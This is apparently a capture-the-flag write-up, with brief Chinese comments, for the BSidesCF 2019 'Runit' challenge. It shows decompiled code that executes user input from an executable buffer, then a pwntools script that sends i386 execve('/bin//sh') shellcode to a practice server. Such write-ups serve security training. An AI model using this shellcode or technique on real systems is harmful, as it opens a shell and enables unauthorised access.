[BSidesCF 2019]Runit
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
32位,只开了nx
int __cdecl main(int argc, const char **argv, const char **envp)
{
void *buf; // [esp+8h] [ebp-10h]
buf = mmap(0, 0x400u, 7, 34, 0, 0);
alarm(0xAu);
setvbuf(stdout, 0, 2, 0);
setvbuf(_bss_start, 0, 2, 0);
puts("Send me stuff!!");
if ( read(0, buf, 0x400u) < 0 )
{
puts("Error reading!");
exit(1);
}
((void (*)(void))buf)();
return 0;
}
buf开辟了7权限
然后最后还执行了buf
(又水一题x
from pwn import*
from Yapack import *
context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",26129,"./pwn",10)
sl(b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80')
ia()